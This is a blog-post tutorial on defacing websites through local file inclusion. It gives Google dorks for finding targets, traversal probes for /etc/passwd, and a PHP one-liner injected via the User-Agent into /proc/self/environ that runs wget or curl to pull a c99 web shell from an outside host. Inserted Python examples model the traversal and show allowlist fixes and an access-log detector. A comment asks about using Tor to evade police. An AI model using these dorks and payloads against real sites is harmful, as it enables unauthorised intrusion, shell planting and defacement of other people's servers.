BLACK BURN HACKER


Wednesday, April 18, 2012

Defacing Website Using Advanced LFI [Full]

This type of exploitation is generally known as LFI exploitation via /proc/self/environ. It goes a step beyond the basic /etc/passwd read: instead of only reading files off the server, you include a file whose contents you partly control, so the PHP you put into it gets executed by the server.
So let's begin.



LFI (Local File Inclusion)

There are a couple of things you need before you start:
1. Firefox.
2. The Tamper Data add-on for Firefox - https://addons.mozilla.org/sv-se/fir...n/tamper-data/
Any other tool that lets you set the User-Agent header on a request (curl -A, for example) does the same job.

Finding Vulnerable Website

You can find candidate sites by googling with dorks like the ones below. A dork only finds pages that pass a file name in a parameter; it does not tell you the page is vulnerable, so every hit still has to be tested:
Code:
inurl:".php?action="
inurl:".php?board="
inurl:".php?cat="
inurl:".php?date="
inurl:".php?detail="
inurl:".php?dir="
inurl:".php?download="
inurl:".php?file="
inurl:".php?get="
inurl:".php?info="
If you want more dorks, search http://google.com or http://pastebin.com for "LFI dorks".

Test For Vulnerability
Now suppose you have chosen your website. The next task is to test whether the parameter is really handed to include() or require(). Here is how:

Suppose you have found a website - http://www.site.com/index.php?cat=home.php
Replace home.php with a name that cannot exist, like 12. If the page comes back with a PHP warning such as "include(12): failed to open stream: No such file or directory" or "Failed opening '12' for inclusion", the parameter reaches a file-inclusion call. If the server hides errors, the tell is that the content normally pulled in by that parameter simply disappears from the page. (The original post showed a screenshot of the warning here.)

That warning makes the site a candidate, not yet a confirmed target. Whether you can get anywhere depends on the next step: if the script does not filter ../ and open_basedir is not set, you can read any file the web server user can, and proceed from there.

Pre-Exploitation
So now our target website is http://www.site.com/index.php?cat=home.php
Before going after code execution we run the classic test, reading /etc/passwd. It proves the include will follow ../ out of the web root, and it tells us how many ../ are needed to reach the filesystem root; the same prefix is reused for /proc/self/environ afterwards.
To find the traversal depth:
Replace home.php with ../etc/passwd
If the page still looks normal (or shows the same "failed to open stream" warning), add another "../" in front [without quotes], so the URL looks like http://www.site.com/index.php?cat=../../etc/passwd, and keep adding one "../" at a time until the contents of /etc/passwd (root:x:0:0:... and so on) show up in the page. (The original post showed a screenshot of that here.)

Here the file came up after putting 19 "../" before "../etc/passwd". The count only has to be at least the depth of the directory the include resolves from; once you are at / every extra ../ is ignored, so overshooting costs nothing and you can start with a generous number.
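The traversal step above, modelled as an added example in Python (not code from the original post): it mirrors what `include($_GET['cat'])` resolves to for a given working directory, shows why 19 or 20 `../` both land on /etc/passwd, and puts the two checks that stop it next to the vulnerable resolution. The web root `/var/www/html` and the page names in the allowlist are assumptions for the demonstration.

```python
import posixpath

# Assumed layout for this example: the vulnerable index.php sits in the
# document root and the PHP process's working directory is that root.
WEBROOT = "/var/www/html"
ALLOWED_PAGES = ("home.php", "news.php", "contact.php")   # assumed page set

def vulnerable_include_target(cat, cwd=WEBROOT):
    """Model of `include($_GET['cat']);` with no validation at all.

    PHP resolves a relative path beginning with ./ or ../ against the working
    directory; the kernel then collapses the ../ segments, and ../ above / is
    simply ignored. posixpath.normpath does the same, which is why more ../
    than strictly needed still lands on the right file."""
    return posixpath.normpath(posixpath.join(cwd, cat))

def traversal_depth(cwd=WEBROOT):
    """How many ../ it takes to climb from cwd to /: the minimum that works."""
    return len([part for part in cwd.split("/") if part])

def allowlisted_target(cat, webroot=WEBROOT, allowed=ALLOWED_PAGES):
    """Preferred fix: treat the parameter as a page *name* and look it up in a
    fixed set. Anything not in the set, traversal or otherwise, is rejected."""
    if cat in allowed:
        return posixpath.join(webroot, cat)
    return None

def contained_target(cat, webroot=WEBROOT):
    """Fallback when a real path has to be accepted: canonicalise it, then
    require the result to stay under the web root. Production code should
    canonicalise with realpath() so a symlink cannot escape; this offline
    model uses normpath because there is no filesystem to resolve against."""
    if "\0" in cat:                       # a NUL would truncate the path in C
        return None
    base = webroot.rstrip("/")
    resolved = posixpath.normpath(posixpath.join(base, cat))
    if resolved == base or resolved.startswith(base + "/"):
        return resolved
    return None

if __name__ == "__main__":
    for probe in ("home.php", "../../../etc/passwd", "../" * 20 + "etc/passwd"):
        print(f"{probe!r:45} -> include reads {vulnerable_include_target(probe)}")
    print("../ needed from", WEBROOT, "=", traversal_depth())
    print("allowlist:", allowlisted_target("../../../etc/passwd"))
    print("contained:", contained_target("../../../etc/passwd"))
```

The allowlist is the fix to reach for: the parameter names a page, it never names a path. The containment check is only for the rare case where a path really must be accepted, and then it has to run on the canonical path, not the raw string, or `..` and symlinks slip through.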

You have completed half of your exploit:

Now suppose that our injection path looks like - http://www.site.com/index.php?cat=../../../../../../etc/passwd
Now just replace "etc/passwd" with "proc/self/environ". /proc/self/environ is the environment of the process that reads it, here the PHP process, stored as NAME=value pairs, and it comes out on the page as one long run of text. Look for HTTP_USER_AGENT in it: if it is there, the web server passes the request headers into that environment, which is what the next step relies on. That is the case when PHP runs as CGI (one process per request, as on much shared hosting of the time); with mod_php or php-fpm you only see the server's startup environment, the header never lands in it, and this technique does not work. (The original post showed a screenshot of the environ dump here.)



Uploading shell
Now we use Tamper Data to set our User-Agent to a bit of PHP that runs a shell command. In Firefox go to Tools, Tamper Data, click Start Tamper, then load the /proc/self/environ URL from the previous step and click Tamper on the request:

Because include() executes anything between PHP tags in the file it pulls in, whatever you put in that header runs on the server as the web server user. Replace the User-Agent value in the Tamper Data dialog with this piece of code:
Code:
<?php system('wget http://www.sh3ll.org/c99.txt -O shell.php'); ?>


OR


Code:
<?php system('curl -o shell.php http://www.sh3ll.org/c99.txt'); ?>


Where http://www.sh3ll.org/c99.txt is the place you host your shell as plain text (a .txt file, so your own host does not execute it). The one-liner uses the full <?php tag so it does not depend on short_open_tag being enabled. It needs wget or curl on the target and outbound HTTP allowed from it, and it writes shell.php into the PHP process's working directory, normally the directory of index.php, which therefore has to be writable by the web server user.
Example: (The original post showed a screenshot of the Tamper Data dialog here.)


Now click "OK"
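What happens on the server at this point, as an added example that is not part of the original post: the PHP process reads its own /proc/self/environ, and the included bytes are handed to the PHP engine, which echoes everything outside `<?php ... ?>` and executes everything inside. The environ blob below is constructed for the demonstration of a CGI-mode PHP process (variable names and values are assumptions, and `system('id')` stands in for the wget payload above); the code shows why the User-Agent entry is the one that ends up executing.

```python
import re

# Constructed sample of /proc/self/environ as read by a PHP process started
# as CGI for this one request (assumed layout; real contents vary by server).
# Entries are NAME=value separated by NUL bytes, and the request headers
# appear as HTTP_* variables. system('id') stands in for any payload.
SAMPLE_ENVIRON = (
    b"SCRIPT_FILENAME=/var/www/html/index.php\0"
    b"QUERY_STRING=cat=../../../proc/self/environ\0"
    b"REQUEST_METHOD=GET\0"
    b"HTTP_USER_AGENT=<?php system('id'); ?>\0"
    b"HTTP_ACCEPT=*/*\0"
    b"REMOTE_ADDR=203.0.113.7\0"
)

# Opening tag (<?php, <?= or a bare <? short tag), lazily up to the closing ?>
PHP_BLOCK_RE = re.compile(r"<\?(?:php\b|=)?(.*?)\?>", re.DOTALL)

def parse_environ(blob):
    """Turn the NUL-separated NAME=value blob into a dict."""
    env = {}
    for entry in blob.split(b"\0"):
        if entry:
            name, _, value = entry.partition(b"=")
            env[name.decode("ascii", "replace")] = value.decode("utf-8", "replace")
    return env

def php_segments(text):
    """What include() hands to the engine: text outside <?php ... ?> is echoed
    verbatim, text inside is compiled and run. Returns the inside parts."""
    return [m.group(1).strip() for m in PHP_BLOCK_RE.finditer(text)]

def executed_code(blob):
    """(variable, code) pairs PHP would execute if the vulnerable include()
    pulled in this environ. Only entries carrying PHP tags contribute, which
    is why a header the client controls is the injection channel."""
    return [(name, seg)
            for name, value in parse_environ(blob).items()
            for seg in php_segments(value)]

if __name__ == "__main__":
    for name, code in executed_code(SAMPLE_ENVIRON):
        print(f"{name} -> PHP executes: {code}")
```

Any header the server copies into the environment would do; User-Agent is just the one every browser sends and every tampering tool can rewrite. The same parse also explains the raw dump you saw a step earlier: the page shows the values run together because the NUL separators are invisible in HTML.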

When done, browse to http://www.site.com/shell.php (the file lands next to index.php) and the shell's page comes up. (The original post showed a screenshot of it here.)


This is your shell and from here on you can deface the whole website!
It took me a lot of time to write this tutorial, so a "thanks" is very much appreciated!

GoodLuck
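The defender's view of the same chain, as an added example that is not part of the original post: every step above (the ../ probes, the /proc/self/environ read, the PHP tag in the User-Agent, and the first request to the freshly written shell.php) shows up in an Apache combined-format access log. The log lines below are constructed for the demonstration (RFC 5737 test addresses, example.invalid as the payload host), and the indicator list is a starting point, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines for this example (RFC 5737 test
# addresses, example.invalid host). Line 1 is a normal visit; lines 2-4 are the
# traversal probe, the environ read with the injected User-Agent, and the first
# request to the shell that the injected command wrote.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [18/Apr/2012:10:00:01 +0000] "GET /index.php?cat=home.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Apr/2012:10:00:07 +0000] "GET /index.php?cat=../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Apr/2012:10:00:12 +0000] "GET /index.php?cat=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2310 "-" '
    '"<?php system(\'wget http://example.invalid/c.txt -O shell.php\'); ?>"',
    '203.0.113.9 - - [18/Apr/2012:10:00:15 +0000] "GET /shell.php HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)?")
SHELL_FUNCS = ("system(", "exec(", "passthru(", "shell_exec(")

def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode twice so single- and double-URL-encoded ../ both read as ../
    rec["path"] = unquote(unquote(rec["path"]))
    return rec

def indicators(rec):
    """Return the LFI indicators present in one request record."""
    hits = []
    path, ua = rec["path"], rec["ua"]
    if "../" in path or "..\\" in path:
        hits.append("path traversal")
    if "/etc/passwd" in path:
        hits.append("etc/passwd read")
    if "/proc/self/environ" in path:
        hits.append("proc/self/environ read")
    if PHP_TAG_RE.search(ua) or any(f in ua for f in SHELL_FUNCS):
        hits.append("php code in user-agent")
    return hits

def scan(lines):
    """Walk the log in order. Returns (alerts, follow_on):
    alerts    - (ip, decoded path, indicators) for every request with indicators
    follow_on - (ip, path) for a request by an already-flagged client to a .php
                path nobody requested before; right after an environ injection
                that is most likely the dropped shell being opened."""
    alerts, follow_on = [], []
    flagged, seen_paths = set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec["path"].split("?", 1)[0]
        hits = indicators(rec)
        if hits:
            alerts.append((rec["ip"], rec["path"], hits))
            flagged.add(rec["ip"])
        elif rec["ip"] in flagged and path_only.endswith(".php") and path_only not in seen_paths:
            follow_on.append((rec["ip"], path_only))
        seen_paths.add(path_only)
    return alerts, follow_on

if __name__ == "__main__":
    found, followed = scan(SAMPLE_LOG_LINES)
    for ip, path, hits in found:
        print(f"ALERT  {ip} {path} -> {', '.join(hits)}")
    for ip, path in followed:
        print(f"FOLLOW {ip} first request to new file {path}")
```

The follow-on check is what turns three noisy alerts into an incident: a client that just read /proc/self/environ with PHP in its User-Agent and then fetches a .php file nobody has ever requested has almost certainly written it. On the hardening side, the same chain is cut by any one of an allowlist on the parameter, open_basedir confining PHP to the web root, or a web root the web server user cannot write to.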

©2012, copyright BLACK BURN

1 comment:

  1. This is illegal, are police going to trace me down? Should I use Tor?


 
